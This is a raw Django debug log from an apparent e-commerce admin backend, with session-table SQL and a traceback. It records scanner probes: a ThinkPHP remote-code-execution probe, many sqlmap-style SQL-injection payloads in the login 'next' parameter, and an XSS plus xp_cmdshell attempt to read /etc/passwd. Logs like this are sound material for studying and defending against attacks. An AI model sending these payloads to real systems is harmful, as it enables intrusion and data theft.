'2020-01-15T13:20:34.885870+00:00'::timestamptz); args=('k1y1he54jenw7h8irl0wnh2oqhxak7a1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 13, 20, 34, 885870, tzinfo=)) [01/Jan/2020 13:20:34] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [01/Jan/2020 13:22:42] "GET / HTTP/1.0" 302 0 Not Found: /index.php [01/Jan/2020 13:24:44] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6454 [01/Jan/2020 13:27:45] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:32:48] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:37:51] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:42:54] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:47:57] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:52:59] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:53:42] "GET / HTTP/1.0" 302 0 [01/Jan/2020 13:58:02] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [01/Jan/2020 14:03:35] "POST /editBlackAndWhiteList HTTP/1.0" 500 63993 [01/Jan/2020 14:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:20:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:25:11] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:30:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:33:30] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:35:18] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:40:20] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [01/Jan/2020 14:43:29] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [01/Jan/2020 14:43:41] "GET /dyzl/Print.asp?ArticleID=290 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [01/Jan/2020 14:44:01] "GET /xyzx/SendMail.asp?ArticleID=372 HTTP/1.0" 404 6376 [01/Jan/2020 14:45:23] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:50:00] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:50:26] "GET / HTTP/1.0" 302 0 [01/Jan/2020 14:55:18] "GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status HTTP/1.0" 301 0 DEBUG 2020-01-01 14:55:18,319 utils 2749 140297233225472 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'servlet'; args=('servlet',) Not Found: /servlet/ [01/Jan/2020 14:55:18] "GET /servlet/?m=mod_listener&p=login&q=loginForm&jumpto=status HTTP/1.0" 404 1791 [01/Jan/2020 14:58:12] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:05:02] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:15:07] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:20:10] "GET / HTTP/1.0" 302 0 [01/Jan/2020 15:22:55] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 15:25:03,331 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq' LIMIT 1; args=('mdif0ntvm8ofr20tlxnaivqmnsagl1uq',) DEBUG 2020-01-01 15:25:03,333 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mdif0ntvm8ofr20tlxnaivqmnsagl1uq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:03.331866+00:00'::timestamptz); args=('mdif0ntvm8ofr20tlxnaivqmnsagl1uq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 3, 331866, tzinfo=)) [01/Jan/2020 15:25:03] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:03,557 utils 2749 140297233225472 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-01T15:25:03.547197+00:00'::timestamptz AND "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'); args=(datetime.datetime(2020, 1, 1, 15, 25, 3, 547197, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') DEBUG 2020-01-01 15:25:03,585 utils 2749 140297233225472 (0.003) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-15T15:25:03.581479+00:00'::timestamptz WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 3, 581479, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') [01/Jan/2020 15:25:03] "GET /login/?next=%2F&aYZZ%3D4726%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.0" 200 2058 DEBUG 2020-01-01 15:25:04,217 utils 2749 140297233225472 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-01T15:25:04.206339+00:00'::timestamptz AND "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'); args=(datetime.datetime(2020, 1, 1, 15, 25, 4, 206339, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') DEBUG 2020-01-01 15:25:04,244 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-15T15:25:04.241553+00:00'::timestamptz WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 4, 241553, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') [01/Jan/2020 15:25:04] "GET /login/?next=%2F HTTP/1.0" 200 1788 DEBUG 2020-01-01 15:25:04,359 utils 2749 140297233225472 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-01T15:25:04.349699+00:00'::timestamptz AND "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'); args=(datetime.datetime(2020, 1, 1, 15, 25, 4, 349699, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') DEBUG 2020-01-01 15:25:04,387 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-15T15:25:04.385135+00:00'::timestamptz WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 4, 385135, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') [01/Jan/2020 15:25:04] "GET /login/?next=6156 HTTP/1.0" 200 1792 DEBUG 2020-01-01 15:25:04,522 utils 2749 140297233225472 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-01T15:25:04.507398+00:00'::timestamptz AND "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'); args=(datetime.datetime(2020, 1, 1, 15, 25, 4, 507398, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') DEBUG 2020-01-01 15:25:04,571 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-15T15:25:04.568288+00:00'::timestamptz WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 4, 568288, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') [01/Jan/2020 15:25:04] "GET /login/?next=7525 HTTP/1.0" 200 1792 DEBUG 2020-01-01 15:25:04,686 utils 2749 140297233225472 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-01T15:25:04.677293+00:00'::timestamptz AND "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'); args=(datetime.datetime(2020, 1, 1, 15, 25, 4, 677293, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') DEBUG 2020-01-01 15:25:04,713 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-15T15:25:04.710939+00:00'::timestamptz WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 4, 710939, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') [01/Jan/2020 15:25:04] "GET /login/?next=%2F%22.%2C%27.%28%29%28%28%2C HTTP/1.0" 200 1833 DEBUG 2020-01-01 15:25:04,878 utils 2749 140297233225472 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2020-01-01T15:25:04.862302+00:00'::timestamptz AND "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'); args=(datetime.datetime(2020, 1, 1, 15, 25, 4, 862302, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') DEBUG 2020-01-01 15:25:04,914 utils 2749 140297233225472 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2020-01-15T15:25:04.912222+00:00'::timestamptz WHERE "django_session"."session_key" = 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 4, 912222, tzinfo=), 'mdif0ntvm8ofr20tlxnaivqmnsagl1uq') [01/Jan/2020 15:25:04] "GET /login/?next=%2F%27nZdHqf%3C%27%22%3EsngdYN HTTP/1.0" 200 1851 DEBUG 2020-01-01 15:25:06,278 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uxguidutlp5ddqu71muam7rhha2alnv4' LIMIT 1; args=('uxguidutlp5ddqu71muam7rhha2alnv4',) DEBUG 2020-01-01 15:25:06,280 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uxguidutlp5ddqu71muam7rhha2alnv4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:06.279139+00:00'::timestamptz); args=('uxguidutlp5ddqu71muam7rhha2alnv4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 6, 279139, tzinfo=)) [01/Jan/2020 15:25:06] "GET /login/?next=%2F%29%20AND%209238%3D4999%20AND%20%281110%3D1110 HTTP/1.0" 200 1864 DEBUG 2020-01-01 15:25:06,444 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'vr0zjatrqib7gl6sexvviba6b24h68db' LIMIT 1; args=('vr0zjatrqib7gl6sexvviba6b24h68db',) DEBUG 2020-01-01 15:25:06,446 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('vr0zjatrqib7gl6sexvviba6b24h68db', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:06.444764+00:00'::timestamptz); args=('vr0zjatrqib7gl6sexvviba6b24h68db', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 6, 444764, tzinfo=)) [01/Jan/2020 15:25:06] "GET /login/?next=%2F%29%20AND%209225%3D9225%20AND%20%283750%3D3750 HTTP/1.0" 200 1864 DEBUG 2020-01-01 15:25:06,644 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '7y6ulqx52lelldgkkm37kunxmnkstk90' LIMIT 1; args=('7y6ulqx52lelldgkkm37kunxmnkstk90',) DEBUG 2020-01-01 15:25:06,647 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('7y6ulqx52lelldgkkm37kunxmnkstk90', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:06.645289+00:00'::timestamptz); args=('7y6ulqx52lelldgkkm37kunxmnkstk90', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 6, 645289, tzinfo=)) [01/Jan/2020 15:25:06] "GET /login/?next=%2F%20AND%203466%3D1187 HTTP/1.0" 200 1822 DEBUG 2020-01-01 15:25:06,806 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lgsqxpvmemw9dh67dp1u9l6h6szcj7zy' LIMIT 1; args=('lgsqxpvmemw9dh67dp1u9l6h6szcj7zy',) DEBUG 2020-01-01 15:25:06,808 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lgsqxpvmemw9dh67dp1u9l6h6szcj7zy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:06.806987+00:00'::timestamptz); args=('lgsqxpvmemw9dh67dp1u9l6h6szcj7zy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 6, 806987, tzinfo=)) [01/Jan/2020 15:25:06] "GET /login/?next=%2F%20AND%209225%3D9225 HTTP/1.0" 200 1822 DEBUG 2020-01-01 15:25:06,968 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'h5nq3qxc7ffpnx41s1a798c0xlnnh0rb' LIMIT 1; args=('h5nq3qxc7ffpnx41s1a798c0xlnnh0rb',) DEBUG 2020-01-01 15:25:06,970 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('h5nq3qxc7ffpnx41s1a798c0xlnnh0rb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:06.968753+00:00'::timestamptz); args=('h5nq3qxc7ffpnx41s1a798c0xlnnh0rb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 6, 968753, tzinfo=)) [01/Jan/2020 15:25:06] "GET /login/?next=%2F%20AND%206467%3D6900 HTTP/1.0" 200 1822 DEBUG 2020-01-01 15:25:07,371 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '39534q4mktb0adsv63ws91v30pzidld9' LIMIT 1; args=('39534q4mktb0adsv63ws91v30pzidld9',) DEBUG 2020-01-01 15:25:07,375 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('39534q4mktb0adsv63ws91v30pzidld9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:07.371878+00:00'::timestamptz); args=('39534q4mktb0adsv63ws91v30pzidld9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 7, 371878, tzinfo=)) [01/Jan/2020 15:25:07] "GET /login/?next=%2F%20AND%20%28SELECT%20CHR%2890%29%26CHR%2886%29%26CHR%28118%29%26CHR%28104%29%20FROM%20MSysAccessObjects%29%3DCHR%2890%29%26CHR%2886%29%26CHR%28118%29%26CHR%28104%29 HTTP/1.0" 200 2080 DEBUG 2020-01-01 15:25:07,563 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rjc0oeyj7kd1sem2kvzv6dca65lfnnzs' LIMIT 1; args=('rjc0oeyj7kd1sem2kvzv6dca65lfnnzs',) DEBUG 2020-01-01 15:25:07,566 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rjc0oeyj7kd1sem2kvzv6dca65lfnnzs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:07.564474+00:00'::timestamptz); args=('rjc0oeyj7kd1sem2kvzv6dca65lfnnzs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 7, 564474, tzinfo=)) [01/Jan/2020 15:25:07] "GET /login/?next=%2F%20AND%20%28SELECT%20CHR%2865%29%7C%7CCHR%2885%29%7C%7CCHR%28103%29%7C%7CCHR%28115%29%20FROM%20SYSIBM.SYSDUMMY1%29%3DCHR%2865%29%7C%7CCHR%2885%29%7C%7CCHR%28103%29%7C%7CCHR%28115%29 HTTP/1.0" 200 2078 DEBUG 2020-01-01 15:25:07,738 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd98ohbrkmbfecxd5afd0n9mlwldbcafb' LIMIT 1; args=('d98ohbrkmbfecxd5afd0n9mlwldbcafb',) DEBUG 2020-01-01 15:25:07,741 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d98ohbrkmbfecxd5afd0n9mlwldbcafb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:07.739370+00:00'::timestamptz); args=('d98ohbrkmbfecxd5afd0n9mlwldbcafb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 7, 739370, tzinfo=)) [01/Jan/2020 15:25:07] "GET /login/?next=%2F%20AND%20%28SELECT%20%27uBId%27%20FROM%20RDB%24DATABASE%29%3D%27uBId%27 HTTP/1.0" 200 1920 DEBUG 2020-01-01 15:25:07,979 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v7nilc1fisg4nkuazexdpjkk6skiljzp' LIMIT 1; args=('v7nilc1fisg4nkuazexdpjkk6skiljzp',) DEBUG 2020-01-01 15:25:07,981 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v7nilc1fisg4nkuazexdpjkk6skiljzp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:07.979583+00:00'::timestamptz); args=('v7nilc1fisg4nkuazexdpjkk6skiljzp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 7, 979583, tzinfo=)) [01/Jan/2020 15:25:07] "GET /login/?next=%2F%20AND%20%28SELECT%20%27uBId%27%20FROM%20RDB%24DATABASE%29%3D%27KAeF%27 HTTP/1.0" 200 1920 DEBUG 2020-01-01 15:25:08,299 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g7lxfjq3lsgl43nhyorjf1cpbwktx29i' LIMIT 1; args=('g7lxfjq3lsgl43nhyorjf1cpbwktx29i',) DEBUG 2020-01-01 15:25:08,302 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g7lxfjq3lsgl43nhyorjf1cpbwktx29i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:08.300394+00:00'::timestamptz); args=('g7lxfjq3lsgl43nhyorjf1cpbwktx29i', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 8, 300394, tzinfo=)) [01/Jan/2020 15:25:08] "GET /login/?next=%2F%20AND%209222%3D%28%27qxvkq%27%7C%7C%28SELECT%20CASE%209222%20WHEN%209222%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27qppzq%27%29 HTTP/1.0" 200 2046 DEBUG 2020-01-01 15:25:08,475 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm4105rpopucjncywwk4w01hb3g3l22n4' LIMIT 1; args=('m4105rpopucjncywwk4w01hb3g3l22n4',) DEBUG 2020-01-01 15:25:08,478 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m4105rpopucjncywwk4w01hb3g3l22n4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:08.476529+00:00'::timestamptz); args=('m4105rpopucjncywwk4w01hb3g3l22n4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 8, 476529, tzinfo=)) [01/Jan/2020 15:25:08] "GET /login/?next=-8082 HTTP/1.0" 200 1794 DEBUG 2020-01-01 15:25:08,649 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'mj2pke7sel0ipkpv2186vzqrkn63chsr' LIMIT 1; args=('mj2pke7sel0ipkpv2186vzqrkn63chsr',) DEBUG 2020-01-01 15:25:08,651 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('mj2pke7sel0ipkpv2186vzqrkn63chsr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:08.649727+00:00'::timestamptz); args=('mj2pke7sel0ipkpv2186vzqrkn63chsr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 8, 649727, tzinfo=)) [01/Jan/2020 15:25:08] "GET /login/?next=-6311%20OR%201786%3D%28%27qxvkq%27%7C%7C%28SELECT%20CASE%201786%20WHEN%201786%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27qppzq%27%29 HTTP/1.0" 200 2050 DEBUG 2020-01-01 15:25:08,809 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ilehy6w3jw0ltytu1qsml4r9xiysbq7l' LIMIT 1; args=('ilehy6w3jw0ltytu1qsml4r9xiysbq7l',) DEBUG 2020-01-01 15:25:08,811 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ilehy6w3jw0ltytu1qsml4r9xiysbq7l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:08.810016+00:00'::timestamptz); args=('ilehy6w3jw0ltytu1qsml4r9xiysbq7l', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 8, 810016, tzinfo=)) [01/Jan/2020 15:25:08] "GET /login/?next=%28SELECT%208219%3D%28%27qxvkq%27%7C%7C%28SELECT%20CASE%208219%20WHEN%208219%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27qppzq%27%29%29 HTTP/1.0" 200 2052 DEBUG 2020-01-01 15:25:08,980 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '43kj5z2akqhzep661nfi8cnseuln2967' LIMIT 1; args=('43kj5z2akqhzep661nfi8cnseuln2967',) DEBUG 2020-01-01 15:25:08,982 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('43kj5z2akqhzep661nfi8cnseuln2967', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:08.980722+00:00'::timestamptz); args=('43kj5z2akqhzep661nfi8cnseuln2967', 